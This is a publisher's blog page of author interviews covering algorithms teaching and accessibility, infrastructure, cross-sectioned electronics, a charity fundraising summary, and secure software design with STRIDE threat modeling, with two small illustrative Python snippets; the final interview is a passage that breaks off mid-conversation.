No Starch Press Blog

Solving Problems with Algorithms-Ace Dan Zingaro

 

Our latest Author Spotlight is on computer-science whiz Daniel Zingaro, author of Algorithmic Thinking, its soon-to-be-published second edition, and Learn to Code by Solving Problems (2021). In the following Q&A, we talk with Dan about his favorite childhood computing memory, how he went from nearly dropping out of CS classes at university to teaching them, the accessibility tools that helped him become a programmer despite being severely visually impaired, and why fellow educators should feel empowered to write books about the subjects they teach.

Daniel Zingaro, PhD, is an award-winning associate professor of Mathematical and Computational Sciences at the University of Toronto Mississauga, where he is well-known for his uniquely interactive approach to teaching, and internationally recognized for his expertise in Active Learning. In addition to writing, educating, and researching, Zingaro is one of our go-to technical editors, whose work includes Python for Kids, 2nd Edition (2022), Data Structures the Fun Way (2022), Python for Data Science (2022), and Python One-Liners (2020).


No Starch Press: Congratulations on the second edition of Algorithmic Thinking! One of the things that really makes it unique is your show-not-tell approach to teaching algorithms, where you present the problem first and then guide the reader toward finding the fastest, cleverest solution. It can’t be a coincidence that you’re also an award-winning college professor known for your “active learning” method. Did your experience as an educator influence the way you wrote the book?

 
Daniel Zingaro: Oh, definitely. I've learned so much about teaching from my students, and I always try to incorporate as much of that as I can into my writing. The reason I flipped the book to be "problem first, material second," rather than the opposite, is because many people are not motivated to learn abstract stuff without understanding why it might be useful or matter to them. If I can have a reader read a description of a problem and be like, "Yo! I don't know how to solve this thing," then I feel like the real learning can begin.
 
I've also tried to make the book inviting to students who might otherwise not feel welcome. For example, I didn't put proofs or theorems or much math in there, because I know what that stuff does to many students: "Theorem 1: let x, y, and z be ... oh hey look, a new YouTube video!" So why force students to learn in a specific way? Because we happened to learn that way? Because that's the only way to teach it? Those reasons aren't acceptable to me. Students provide constraints on how they want to learn. If we professors are all we think we're cracked up to be, let's rise to this challenge and teach under those constraints. There's no right way to teach. If someone (like, literally, I mean one person) learns from it, then it is right.

 
NSP: It’s hard to believe that you twice came close to dropping out of Computer Science while attending university — and nearly failed a course that you later went on to teach. But it must be true because you disclose this personal trivia to your students. Why is it important for you to be so open about your past struggles?
 
DZ: It's true! I really need to dig out my old transcript and post it online for students so they can see my near-failing grade. It's very important to me to share these low points with students because many students experience low points of their own. The way I connect with the world is through humor and making personal connections. If there's anything I can share with people that helps me make these connections, then I will do it. 
 
My waffling on whether to drop out of Computer Science, and the poor grades I suffered, offer ways for me to make these connections. How funny, right? A professor who almost failed a course? It's really too bad that it's funny – I mean, the only reason it's funny is because it's so rare. With the poor grades and other challenges, I'm fortunate to have still gotten here. But I did, somehow. I figure that maybe my struggles can somehow help someone else with their own struggles.

 
NSP: Let’s talk about accessible computing for a moment. A lot of our readers may be surprised to learn that you’ve been blind your entire life, which would put you in the very small category of visually impaired students who successfully learn programming and earn advanced degrees in the subject. What adaptive tools helped you overcome the challenges you faced? And, how has the level of accessibility in computing evolved?
 
DZ: Yep – that's why my books don't have any extraneous pictures. Or cute sidebars. Or cute icons.
 
The computing tools for accessibility these days are making huge advances. I use the free NVDA screen-reader to do all of my computing tasks. But looking back, the tools only helped me because my parents gave me the opportunity for the tools to help me. My parents are in the Acknowledgements section of my book because, without them, there is no book, there is no career, there is no who-knows-what-else. If you have a disability or are otherwise being excluded, then (if it's safe to do so): advocate for yourself. That's what I learned from them. Could I have advocated for myself otherwise? Could I have advocated if I didn't feel safe in Canada doing so? Probably not. That's scary. I may have worked hard, but the world gave me the opportunity for my work to mean something. How many people work even harder and never have the opportunity to benefit? That's a tragedy.
 
I try to use one of my lectures every year to show my students the tools that I use to teach. They're computer scientists and are going to be building tools that all of us will use in the future, so I like to show them how much accessibility matters, for real, to a real person. And I always start with a 10-minute discussion of how I hope they interpret what I'm about to show them. It seems natural for them to hear my super-fast screen-reader speech, or the handheld device I use to read Braille, and be like, "holy cow, Dan is epic!" But I'm not. The tools are epic. Actually, wait; that's not quite it. We're all epic. Many people can read or write or do amazing things. And, yeah, the way that most (non-visually impaired) people do it is different than how I do it – but at the end of the day, the technology exists and makes it so that I can do it, too.
 
Also, a big shout-out to everyone who cares about accessibility and/or works to make software or processes or the world in general more accessible. We need people (including ourselves) to encourage us, and we need the accessibility tools to realize that encouragement.

 
NSP: Another thing our readers might not know about you is that you're the technical editor behind some of our bestselling books, including Data Structures the Fun Way and the new edition of Python for Kids. Since you've already made a name for yourself as a writer, what drew you to the unsung-hero role of technical editing, and can you tell us a little about what you actually do in that regard?
 
DZ: I find technical editing to be quite fun. I find learning fun, and editing books helps me sharpen what I know about a particular topic, so it's kind of fun by default. I also welcome the opportunity to help authors produce even better books. It's the best when there's an author doing great work, and I can in some small way help that author even further. Sometimes I'll be editing a book and think, "dang, this is so good! Why couldn't I have written this?" But, the reason is that I couldn't write their book even if I tried. The author has a particular voice, a particular expertise. Editing permits me to revel in that expertise, to just be grateful for the fact that here we have another author who has the ability and opportunity and life circumstances to share what they know.
 
What I do when editing is annoy the author with every tiny improvement/possible improvement that I can think of. (No, really – ask them.) I check all of the code and text, of course, but that's not my favorite part. My favorite part is using what I know about teaching to offer suggestions where I suspect learners may get particularly stuck. A lot of the topics covered in these books are ones I haven't taught before, and even if I have, I know only a small amount about where and why learners do or do not make progress. The challenge really never goes away, that's for sure, but I welcome any opportunity to try my best to be helpful given what I do know.
 
 
NSP: Like many of our authors, you’ve been into programming since you were young. What’s your earliest memory of enjoying computing, and when did it go from being a hobby to a career path?
 
DZ: One of my earliest computing memories also happens to be one of my favorites. My family was trying to get me a computer loaned to us with screen-reading technology on it (as it was expensive in those days and involved several interacting software and hardware devices). We were at an assessment center to look at some models, and my dad and some employees were talking about computery stuff that I didn't understand. Honestly, all I wanted to do was play a computer game or type something funny on the screen, but the adults just kept talking. Finally they stopped and wanted me to try out three different types of computers to see which one I could best work with. I started with the first computer, typing a little story. And then I managed to do what turned out to be the best thing ever: I froze the machine. But not just a normal freeze, a hilarious freeze where the screen-reader thing kept repeating the same “ah ah ah” syllable again and again, with no way to stop it. All of the fancy computery people were trying fancy things but simply could not make it stop. I was doing my absolute best not to laugh, because I desperately wanted the chance to take home a computer that day. Eventually they gave up and had to completely shut it down by flicking the power switch. Once they did that, I just couldn't hold it in anymore and burst out laughing (while also realizing I probably blew my chance at getting them to give me a PC). But, no! It turns out that they were actually impressed that I had successfully frozen the computer, and agreed to loan it to us on the spot. Looking back, I didn't do anything impressive – probably just pressed a bunch of keys at the same time or some such nonsense.
 
Presently, I'd say I'm more of a teacher-person than a computer-person. Computing happens to be the thing that I can apparently teach best, but I get my true motivation from teaching in and of itself. I often catch myself learning something new and then immediately thinking about how I might teach it. Or I'll solve a computing problem and then be thinking about which chapter of a book it might serve as an example in.
 
 
NSP: You’ve been at UT-Mississauga for nearly a decade now. What’s the most significant thing you’ve discovered about teaching Computer Science in all that time?
 
DZ: The most significant thing I've learned is that every book is total junk for a subset of students. For any one of the textbooks I use – say, a classic CS book – there is a subset of students for whom that book just doesn't work. In fact, my happiest teaching days usually involve a student telling me that my book isn't working for them. Now, it might not be their happiest day, because then I try to drag them into a two-hour conversation about why it isn’t working. But I really do want to learn from them and try to do better. And they know how passionate I am about learning, so I don't feel too bad about that!

 
NSP: Much like sky-diving, writing a book takes a leap of faith — and you’ve done both. What advice can you offer to fellow CS educators who have thought about becoming an author but are scared to make the jump?
 
DZ: I'm married now, and I'm pretty sure I signed some wedding papers that make me not allowed to skydive anymore. (I'm guessing that book-writing is still okay, though.)
 
I think CS educators are in a unique position to write books that teach. They have so much experience in the classroom, and I myself was surprised how much of it I was able to carry over into my writing. I'm not an algorithms researcher. I don't know a whole lot more about algorithms than what I put into the book. (You'll know that I learned new algorithm stuff if you ever see a third edition of Algorithmic Thinking!) But, you know what? I think not being an algorithms researcher was a blessing for this book. I'm not so far removed from remembering how challenging it was for me to learn these concepts the first time. And the approaches I know best are the general (not specialized) ones that are applicable to a wide variety of problems that programmers might run into in the wild. I hope readers can see in every chapter how excited I am to learn even more about algorithms, and I hope that excitement helps fuel their own excitement.
 
So, say you teach a web programming course. Or an architecture course. You've tuned it. Your students respond well. Who cares if you're not the foremost expert on web programming or architecture? You're a teacher who knows how to connect with students and, as such, your book is valuable.
 

 

*Use coupon code SPOTLIGHT25 to get 25% off Algorithmic Thinking, 2nd Edition (in addition to the current 25% discount pre-order promo), and 25% off Learn to Code By Solving Problems. Promotion ends June 14, 2023, at midnight PT.

Ride-Along with Engineer Grady Hillhouse, the Ultimate Road Trip Buddy

 

New year, new spotlight—and this one shines on civil engineer and YouTube star Grady Hillhouse. His first book, Engineering in Plain Sight, was released this past Fall to critical acclaim. In the following Q&A, we talk with Grady about how he went from civil engineer to full-time video producer with over 3 million subscribers (hint: woodworking), why all he needed to know about science communication he learned in kindergarten, the importance of average citizens understanding how things work, and the joy of "infrastructure spotting" on the road.

 

Grady Hillhouse is a civil engineer and science communicator widely known for his educational video series "Practical Engineering," currently one of the largest engineering channels on YouTube, with millions of views each month. His videos, which focus on infrastructure and the human-made environment, have garnered media attention from around the world and been featured on the Science Channel, Discovery Channel, and in many publications. Before producing videos full-time, Grady worked as an engineering consultant, focusing primarily on dams and hydraulic structures. He holds degrees from Texas State University and Texas A&M University.


No Starch Press: You got your bachelor’s degree in geography, then later earned a master’s degree in civil engineering, and spent nearly a decade working in the field on infrastructure projects. How did you go from that path to becoming a full-time YouTube sensation?

Grady Hillhouse: Making YouTube videos started as a hobby for me when I was given some woodworking tools. I wanted to learn to use them, and of course, I went to YouTube to watch tutorials. What I found was a community of woodworkers producing videos of their projects and sharing with each other. I was so fascinated that YouTube could be used in a social way (I had only thought of it as a search engine for videos), and I wanted to be a part of the community. Over time, I started including some engineering into my woodworking videos. Eventually I realized that I really enjoy sharing my passion and experience in engineering to others, and I decided to focus on that topic. 
 
I continued making videos about engineering and infrastructure in my free time, and worked to make them better and better. When my first son was born, all that free time I had to make videos vanished. I was forced to make a choice between sticking with my career in engineering or finding a way to support my family with my hobby. Ultimately, I decided I could have a bigger impact on the world producing videos (and writing a book). If everything comes crashing down, I still have my engineering license to fall back on!

 
NSP: You clearly have a genuine passion for the built environment—it shines through in every one of your YouTube videos and all throughout the new book. So, chicken or the egg: Did this interest spring from your graduate studies and (initial) profession, or did your fervor for infrastructure influence your academic and career pursuits?
 
GH: I have been interested in how things work since I was a kid, but my passion for infrastructure really didn’t come until college. My undergraduate classes in water resources are really what led me into civil engineering. My engineering classes are where my eyes were opened to all the “hidden in plain sight” details of the built environment. Every class was like turning on a lamp to illuminate some innocuous part of the constructed environment that I had never noticed before, and I’ve never stopped paying attention since.

 
NSP: Like Bill Nye and Neil deGrasse Tyson, you’re known as a “science communicator.” But one thing engineers are not typically known for is the ability to explain complex technical processes in laypeople's terms. What’s your trick for translating “engineer speak” into engaging, accessible content without dumbing it down?
 
GH: My wife was a kindergarten teacher when I first started working as an engineer, and I once got invited to her elementary school to give a presentation about civil engineering. I built a model showing the different purposes of a dam and reservoir. The first presentation I gave went really well. It seemed like the kids were interested in what I had to say, but I noticed that I was getting questions from teachers. So for the next few classes, I started paying attention to the teachers and administrators in the back as I went through my presentation, and was surprised at how attentive they were. 
 
It slowly kind of dawned on me over the course of these five or six presentations I gave that, when I talked about my career to adults, I was usually trying to make myself sound smart and dignified while avoiding dumbing it down or accidentally patronizing someone. But, when I was talking to students, I didn’t have those pretenses. 
 
I’ve basically spent the past 10 years reminding myself that the average adult knows just as much about civil engineering as your average kindergartner. Half of civil engineers just think about dirt and rock all day. We have no good reason to pretend to be so dignified. It’s not just how you keep the interest of a bunch of kindergartners for 15 minutes; it’s how you reach an audience on their level.

 
NSP: Your book is an “illustrated field guide to the constructed environment” and, indeed, the simple yet incredibly detailed illustrations of every structure being explained on the page really highlight why they should be seen as “monuments to the solutions to hundreds of practical engineering problems,” as you put it. How did these awesome little artistic renderings come about?
 
GH: The idea for the book was very much rooted in the idea that there are all kinds of structures and devices that we see out in the world but can’t identify, and really, can’t even do an internet search for because they are quite difficult to describe. So, each section focuses on the parts of infrastructure that you can see. Just like using a field guide to birds or plants or rocks, as you slowly start to learn the names and purposes of what you can observe, it makes being outside a lot more fun. It gives you something to pay attention to on walks or road trips.
 
When I was a kid, one of my favorite things to do while bored was to open an encyclopedia up to a random page and read about what I found. I really wanted readers to use Engineering in Plain Sight the same way, where you can just open to any page and find something interesting. I worked really hard with my graphics team at MUTI to make each one of the illustrations as rich and full of detail as possible, and I’m so proud of what we came up with together.

 
NSP: The book, much like your YouTube channel “Practical Engineering,” has gotten an amazing response from a wide-ranging audience. And I think it’s fair to say that the majority of people who pre-ordered the book or put it on their holiday wish-list were not, in fact, engineers (though it's been popular in engineering circles, too). Why do you think the rest of us are so captivated by getting an inside look at how cell towers, highways, levees—the built world—actually works?
 
GH: It’s hard to say for sure! But, I suspect part of it is that these structures really are in plain sight. Learning something new about some seemingly mundane part of your immediate surroundings is magical. My favorite comment to get on a video is, “I didn’t even realize I was curious about this until you asked the question.”

 
NSP: A few months ago, you did a “Practical Engineering” video on a massive—and massively troubled—South Texas bridge project. For those who live in the area, like yourself, it’s a local issue. But your “Harbor Bridge” episode now has over 1.6 million views and nearly 3,000 comments. Do you think that helping people understand the infrastructure in their community (and how it can fail) is a way to strengthen civic engagement through a more informed citizenry?
 
GH: I really do believe we need to understand our connection to the constructed environment to care for it and to invest in it, which means we need to know at least a little bit about how it works. Our lives rely on many types of infrastructure: roads, bridges, dams, sewers, pipelines, retaining walls, water towers—these structures form the basic pillars of modern society. 
 
And the decisions we make about infrastructure—where to build it, how to pay for it, and when to maintain it—have consequences that affect everyone in powerful and fundamental ways. So, we need everyone to be involved in those decisions, not just engineers and bureaucrats. We all carry some responsibility for how the world is built around us. Investment in infrastructure requires that we value and appreciate it first, and so that’s what I try to do with my videos and the book.

 
NSP: In addition to opening everyone’s eyes to the feats of infrastructure that surround and support our modern lives, you’ve also introduced us to the oddly joyful pastime of “infrastructure spotting”—something you apparently still get a kick out of. In fact, you note that your “entire life is essentially a treasure hunt for all the interesting little details of the constructed world.” (I bet you’re fun on road trips!) What fuels your ongoing enthusiasm and sense of wonder for the built environment, given you literally wrote the book on the subject?

GH: In any city I visit, I want to learn where they get their water, how their electrical grid is set up, how they manage drainage and flooding and transit and wastewater, et cetera. There is so much variety in how we solve difficult challenges through infrastructure. Plus, we’re always building new things and using new technologies. So, there’s almost always something new to see wherever you go!  

 

With Your Help, We Raised Over $2.75M for Charity!

 

We’ve been partnering with our authors and Humble Bundle on special pay-what-you-want ebook deals since 2015—that’s 30 bundles to date, for those keeping score at home. As anyone who’s taken advantage of these promotions knows, the PWYW model means that you choose between various pricing tiers of titles, then decide how much of your purchase goes to charity.

This is all to say: THANK YOU. We’re fortunate to have such a generous customer base, because over the last eight years we’ve raised more than $2.75 million for two-dozen non-profits, as well as the Hacker Alliance—a 501(c)(3) created by publisher Bill Pollock to support hacker communities around the world.

From promoting digital rights and fighting censorship, to helping marginalized populations learn to code, to supporting education through the United Negro College Fund and Teach for America, we’ve done a lot of good together.

Here’s the full list of nonprofits that your charitable donations have gone towards:

  • Electronic Frontier Foundation
  • The No Starch Press Foundation 
  • Python Software Foundation 
  • Choose-Your-Own-Charity 
  • National Coalition Against Censorship 
  • Freedom of the Press Foundation 
  • Code.org 
  • Internet Security Research Group
  • Freedom to Read Foundation 
  • Book Industry Charitable Foundation
  • Girls Who Code 
  • Comic Book Legal Defense Fund
  • Covenant House 
  • United Negro College Fund
  • Teach For America
  • Code-to-Learn Foundation 
  • Women Who Code, Inc. 
  • Extra Life 
  • Active Minds, Inc. 
  • Every Child a Reader
  • St. Jude Children's Research Hospital 
  • Call of Duty Endowment 
  • The Red Nose Day Fund / Comic Relief, Inc.
  • It Gets Better Project 

 

 

About Humble Bundle 

Humble Bundle sells digital content through its pay-what-you-want bundle promotions and the Humble Store. When purchasing a bundle, customers choose how much they want to pay and decide where their money goes—between the content creators, charity, and Humble Bundle. Since the company's launch in 2010, Humble Bundle has raised more than $140 million through the support of its community for a wide range of charities, providing aid for people across the world. For more information, visit https://www.humblebundle.com/charities

 

Cutting It Up with Open Circuits' Windell Oskay & Eric Schlaepfer

 

Aglow in our Author Spotlight series this month are the daring duo behind Open Circuits: The Inner Beauty of Electronic Components—Windell Oskay and Eric Schlaepfer. Their book is a truly unique photographic exploration of the astonishing design hiding in everyday electronics, and it's as awesome as it sounds. In the following Q&A, we talk with Eric and Windell about how this project came about, the ins and outs of the hardware disassembly and macro-photography feats it took to make the book, the surprises—both good and bad—that they encountered along the way, and the many challenges of cutting a cathode ray tube in two.


Eric is a hardware engineer at Google, and runs the popular Twitter account @TubeTimeUS, where he posts cross-section photos, discusses retrocomputing and reverse engineering, and investigates engineering accidents. His better-known projects are the MOnSter 6502 (the world’s largest 6502 microprocessor, made out of individual transistors) and the Snark Barker (a retro recreation of the famous Sound Blaster sound card).

Windell is the co-founder of Evil Mad Scientist Laboratories, where he designs robots and produces DIY and open source hardware “for art, education, and world domination.” A longtime photographer, he holds a B.A. in Physics and Mathematics from Lake Forest College and a Ph.D. in Physics from the University of Texas at Austin. Besides Open Circuits, he's the author of The Annotated Build-It-Yourself Science Laboratory (Maker Media, 2015).


No Starch Press: First of all, congratulations on all the hard work paying off. The response to your book has been incredible. Considering how popular cross-section pictures were when I was a kid, I guess it’s not too surprising. People still love peeking into things full of hidden complexities! But the books I remember were mostly just intricate drawings—for Open Circuits, you actually photographed real stuff that you cut in half. What inspired this project? Did you intend to add a whole new dimension to the “cutaway” genre?

Eric Schlaepfer: I grew up fascinated by cross sections and cutaways. I’m sure that influenced this book, but it’s not exactly what inspired me. It was a broken piece of equipment, and the problem was one of the electrical components (a tantalum capacitor similar to the one on page 40). I sanded it in half to see if I could figure out how it failed, tweeted a photo, and folks really enjoyed it. So I started cutting other parts in half, and that led to the book.

Windell Oskay: I’ve always been interested in how things are made, in addition to how they work and what’s inside them. One of the really remarkable things about physically cutting things is that you get to see so many features that are maybe incidental to the function of the device, but are signatures of the processes that went into making it. Each part tells a story. And, often, we’re not even saying anything about them. Those little stories are left for the readers to discover.

 

NSP: The two of you have professionally intersected over the years in Silicon Valley, and have worked together on some design projects for Evil Mad Scientist Laboratories. But who roped whom into this book idea? What compelled you to collaborate at such a level?

ES: We’ve worked together on a number of other projects, such as the Three Fives discrete 555 timer kit, as well as the world’s largest 6502 microprocessor—the MOnSter 6502. Windell had seen my photos on Twitter, and we started talking about how to turn it into a book. I don’t remember all the details but it was a very natural thing.

WO: We’ve had a number of fruitful collaborations. In addition to those that Eric mentioned, we also designed an educational project, “Uncovering the Silicon,” that we presented at Maker Faire (along with Ken Shirriff, our technical reviewer for Open Circuits, and John McMaster, who prepared some subjects for photography). In that project, we placed very simple integrated circuits under a microscope and showed how they worked by tracing their individual parts. There’s a sense in which our book is a successor to that project—we’re letting people look at things up close, and then talking through how they work. But, I think that there was actually a moment when I roped Eric into the book idea after seeing his early cross-section photos.

 

NSP: What was the most challenging aspect of putting this book together?

ES: There were many challenges. For me, the most difficult challenge was preparing the samples—it took a really long time to prepare each one, taking care to create a polished section with no scratches or blemishes, and being careful to remove every speck of dust.

WO: At one point we realized that we would have to cull the weakest subjects from our draft. We ended up deleting about a dozen—some quite interesting and beautiful—along with their descriptive text. The book is stronger as a whole because we did so, but it really stung at the time. Fine-tuning our text was also difficult in places. For a number of subjects, we only had a few sentences in which to flesh out subtle concepts clearly, to an audience composed of both laypeople and engineers.

 

NSP: How did you divide up all of the labor that the book entailed? I mean, you had to find hundreds of tiny electronic components, carefully cut them in half, photograph them, write the accompanying text for each page—the list goes on and on!

ES: Windell took on the photography and some of the sample preparation, introducing me to some more professional tools that I hadn’t used before. We spent time searching the local electronics surplus store for potential subjects, and I made a lot of exploratory cuts to see if a particular component would be good enough for the book. I’d say the writing was a 50/50 split—we spent so much time writing and editing over video-chat that I wouldn’t be able to point to any sentence and definitively say 'I wrote this.'

WO: In addition to the bulk of the cutting and sample preparation, Eric also drew the rough drafts of all of the illustrations and wrote the initial drafts of some of the most challenging subjects to describe. I took the photographs, fine-tuned the illustrations, and designed the initial page layout so that we could understand how much text could be paired with each photographic subject. And as Eric said, we worked together closely through all of the writing and editorial choices.

 

NSP: Eric—what was the hardest thing to cross-section, and how did you eventually make it work?

ES: The most challenging was the cathode ray tube (page 186). Windell had the idea to cut it on the slow-speed saw so we could remove the electron gun. I sectioned the glass envelope and the electron gun separately—each of those took several hours to wet sand. The parts were simply too fragile to section any other way. Cleaning the sectioned electron gun was difficult because of the small magnet inside, which vacuumed up the debris created during sanding.

 

NSP: Windell—unlike a cross-section illustration, capturing everything inside an object with a single photograph in a single frame had to be difficult at times. Can you give us some examples where you had to get creative to get the shot?

WO: One of the basic limitations that you can run into with macro photography is the limited depth of field—only a very narrow slice of the view is in focus at any given time. We used focus-stacking software to digitally combine pictures taken at different camera positions, stitching them together like a panorama where the entire subject is sharp and in focus. The circuit-board photograph on the front cover of the book was taken this way. Other times, the subject itself can just be plain hard to photograph.

For some of the LEDs, like the surface-mount LED on page 90, we took photos at different exposure levels and composited them (in a basic HDR—high dynamic range—process) so that you can see detail even in the brightly lit LED. For the color sensor on page 81, the photos came out drab until we added an additional light source at just the right position and brightness so that you could see the additional reflection.
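The core selection step of the focus-stacking technique Windell describes can be sketched in a few lines: for each pixel, keep the value from whichever frame in the stack is locally sharpest. This is only a toy illustration under simplifying assumptions (grayscale frames, already aligned); real stacking software also registers the frames and blends seams.

```python
# Toy focus-stacking sketch: per pixel, keep the value from whichever frame
# is locally sharpest. Assumes grayscale, pre-aligned frames of equal size.
import numpy as np

def sharpness(img):
    """Local sharpness via a discrete Laplacian (large where detail is in focus)."""
    lap = (-4 * img
           + np.roll(img, 1, axis=0) + np.roll(img, -1, axis=0)
           + np.roll(img, 1, axis=1) + np.roll(img, -1, axis=1))
    return np.abs(lap)

def focus_stack(frames):
    """Combine frames focused at different depths into one all-in-focus image."""
    stack = np.stack(frames)                         # shape: (n, h, w)
    scores = np.stack([sharpness(f) for f in frames])
    best = np.argmax(scores, axis=0)                 # winning frame per pixel
    return np.take_along_axis(stack, best[None], axis=0)[0]
```

The same select-the-best-sample idea underlies the HDR compositing mentioned next, except there the selection criterion is well-exposed brightness rather than sharpness.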

 

NSP: How did you decide what samples and images ultimately made it into the book?

ES: During endless hours of video chat we discussed every potential sample and made a highly detailed spreadsheet. We’re both very organized.

WO: Some part of it was determined by which things we could get our hands on—there are probably 50 other things in the spreadsheet that we might have included if we had an example to disassemble. We did skip a number of potential subjects that were too similar to others, too difficult to section, too difficult to photograph, or that were less likely to be of general interest.

 

NSP: Anyone who’s into photography knows that what’s pleasing to the eye is not always pleasing to the lens. Were there any samples that you successfully cross-sectioned but just could not get a good photo of—things you left on the cutting-room floor, as it were?

WO: Yes, there were quite a few actually, including some that we put a lot of time into preparing. A good example is a reed relay, where we just couldn’t get a photo that clearly showed the features that we wanted to highlight.

 

NSP: Given that you both have backgrounds in hardware engineering—and professional tinkering in general—did you know in advance which electronic components would look cool from a cross-cutting perspective, or was there a lot of trial and error? Any surprises along the way, good or bad?

ES: I’ve seen a few component cross sections created for failure-analysis purposes, so I knew about certain components that would look good, but there were definitely a few surprises. We thought an RGB LED would look cool, but after cutting into one, it just didn’t really seem interesting. We took apart a boring-looking gray electronics module that turned out to be a fabulously complex jewel—the isolation amplifier (page 266).

WO: One of my favorites that took some experimentation was the multilayer ceramic capacitor (page 36). There’s never been any mystery about what is in one—stacked layers of metal electrodes—but it took us a lot of experimentation and cutting into different capacitors to find one where you could literally see and count the individual layers. There were definitely real surprises along the way. The way that the rocker DIP switch (page 110) works inside is just stunning elegance.

 

NSP: You include a “Retro Tech” section in the book for your vintage finds, like Nixie tubes, a mercury tilt switch, and even a magnetic tape head. From a purely aesthetic standpoint, which era wins (Old vs. Modern) as far as microscale interior design goes?

ES: They both fascinate me. Vintage components seem warm and natural to me, being made of less processed materials like brass, rubber, mica, and glass. Modern parts have a sort of cold Cartesian precision and a microscopic intricacy.

WO: Modern electronics has so much more to offer in interior design—there’s just so much more inside. If we were talking about exterior design, I’ll pick the vintage. I love all the brass and Bakelite.

 

NSP: Windell, your company’s motto is “Making the World a Better Place, One Evil Mad Scientist at a Time.” If you had to come up with a similar motto for your book, what would it be? I’ll go first: “Making the garage a messier place, one experiment at a time!” . . . I guess what I’m getting at is, what effect do you hope your work in this book has on people? Eric, same question for you.

WO: If the book needed a motto, other than our existing subtitle, I’d pick “Showing you the Hidden Wonders Inside Electronics.” I hope that it inspires people to open up their electronics and look inside. To look at the parts for the little clues about how they’re made, what they’re for, and how they work. To appreciate elegant design, where they weren’t looking for it before.

ES: I want to inflame curiosity. Earlier today my very young nephew was totally absorbed in a copy of the book, asking his mother afterwards if they had any circuits he could play with. The world is a better place with curious people living in it.

 

Redesigning Security with Living-Legend Loren Kohnfelder


This month, we continue our Author Spotlight series with an in-depth interview of Loren Kohnfelder—a true icon in the security realm, as well as the author of Designing Secure Software. In the following Q&A, we talk with him about the everlasting usefulness of threat modeling, why APIs are plagued by security issues, the unsolved mysteries of the SolarWinds hack, and what the recent Log4j exploit teaches us about the importance of prioritizing security design reviews.

DesigningSecureSoftware coverLoren Kohnfelder

Loren Kohnfelder is a highly influential veteran of the security industry, with over 20 years of experience working for companies such as Google and Microsoft—where he program-managed the .NET Framework. At Google, he was a founding member of the Privacy team, performing numerous security design reviews of large-scale commercial platforms and systems. Now retired and based in Hawaii, Loren expands upon his extraordinary contributions to security in his new book, detailing the concepts behind his personal perspective on technology (which can also be found on his blog), timeless insights on building software that's secure by design, and real-world guidance for non-security-experts.


No Starch Press: Aloha, Loren! We can’t talk about your new book without acknowledging the colossal impact your security work has had over the past five decades. For one, in your 1978 MIT thesis you invented Public Key Infrastructure (PKI), introducing the concepts of certificates, CRLs, and the model of trust underlying the entire freaking internet. You were also part of the Microsoft team that first applied threat modeling at scale, you co-developed the STRIDE threat-ID model (Spoofing identity, Tampering with data, Repudiation threats, Information disclosure, Denial of service, and Elevation of privilege), and you helped bake security-design reviews into the development process at Google—all of which are key growth spurts in the evolution of software security.

Speaking of STRIDE, there are a lot of software professionals using the methodology who weren’t even born when you and Praerit Garg first invented it in the late ’90s. Pretty remarkable that something started in the era of desktop computing remains just as relevant in the age of cloud, mobile, and the web. Why do you think it continues to be so effective and seemingly immune from obsolescence?

Loren Kohnfelder: Aloha, Jen! STRIDE turned 23 this month, and the software landscape today is unrecognizable by comparison. Yet, the fundamentals of threat modeling are just as relevant as ever. I think that STRIDE's enduring value is due to its simplicity as an expression of very fundamental threats.

Since those early days, we now have pervasive internet connectivity, exponential growth in compute power and storage, cloud computing, and software itself is vastly more complex. All of these changes have grown the attack surface—plus our greater reliance on digital systems, as well as the massive amounts of data in the world, serve to increase motivation for attackers. For all of these reasons, threat modeling is more important than ever to gain a proactive view of the threat landscape for the best chance of designing, developing, and deploying a secure system.

It's important to note as well that STRIDE never purported to cover the only threats software needs to be concerned with, especially now that we have IoT, robots, and self-driving cars that directly act in the world, introducing new potential forms of harm. For applications beyond traditional information processing, it's critical to consider other possible threats for systems interacting with people and machines in powerful ways.
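A threat-modeling pass with STRIDE boils down to walking each component of a system through the six categories spelled out above. The sketch below pairs each category with a candidate threat for a hypothetical login service; the component name and the example threats are illustrative, not drawn from any real model.

```python
# Illustrative single-component STRIDE pass. A real threat model repeats
# this per component and data flow, then decides mitigations for each hit.
STRIDE = {
    "Spoofing":               "attacker forges another user's session token",
    "Tampering":              "request parameters modified in transit",
    "Repudiation":            "user denies an action; no audit trail exists",
    "Information disclosure": "error page leaks stack traces and secrets",
    "Denial of service":      "unauthenticated endpoint accepts huge uploads",
    "Elevation of privilege": "regular user reaches an admin-only API",
}

def threat_checklist(component):
    """Expand the six STRIDE categories into prompts for one component."""
    return [f"{component} / {cat}: {threat}" for cat, threat in STRIDE.items()]
```

As Kohnfelder notes, this list is a floor, not a ceiling: systems that act in the physical world need categories beyond these six.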

 

NSP: It’s normal for management to tap external security experts to ensure that tech products and systems are safe to deploy—often via a security review prior to release. An essential premise of your book rejects this standard in favor of moving security to the left. What’s wrong with the status quo, why is security by design better for the bottom line, and… are you ever worried that an angry mob of out-of-work security consultants might show up at your door?

LK: No worries at all that software security will be totally solved anytime soon, so there will continue to be strong demand for good minds defending our systems. This is the most challenging topic covered in the book, and my research included discussions with friends doing just that kind of work.

Rather than “reject,” I would say that I'm recommending moving left "in addition to." Here's what I wrote in the book (p. 235) on this: "Specialist consultants should supplement solid in-house security understanding and well-grounded practice, rather than being called in to carry the security burden alone." I don't think that any security consultant has ever concluded a review by saying, "I think I found the last vulnerability in the system!" So let's try to give them more secure software in the first place to review. The two approaches needn't be an either-or decision: the challenge is finding a good balance combining both approaches.

Honestly, I think the experts will appreciate reviewing well-designed systems without low-hanging fruit, so they can really demonstrate their chops by finding the more subtle flaws. In addition, solid design and review documents will provide a very useful map guiding their investigations compared to confronting a mass of code.

 

NSP: A point you make in the book is that “software security is at once a logical practice and an art form, one based on intuitive decision making.” This represents a paradigm shift for most developers, who tend to focus on “typical” use cases during the design phase—in other words, they presume the end product will be used as intended. You propose that they should actually be doing the opposite, that having a “security mindset” means looking at software and systems the way an attacker would. For those daunted by the prospect, can you explain what this means in practice?

LK: You have put your finger on the specific stretch that I'm inviting developers to make, and while the security mindset is a new perspective, I would say that it's more subtle than difficult. Having a security mindset involves seeing how unexpected actions might have surprising outcomes, such as realizing that a paperclip can be bent into a lockpick to open a tumbler lock. Another example from the book is a softball team deviously named "No Game Scheduled"—when the schedule was printed, other teams assumed the name meant that they had a bye, and therefore didn't show, forfeiting the game.

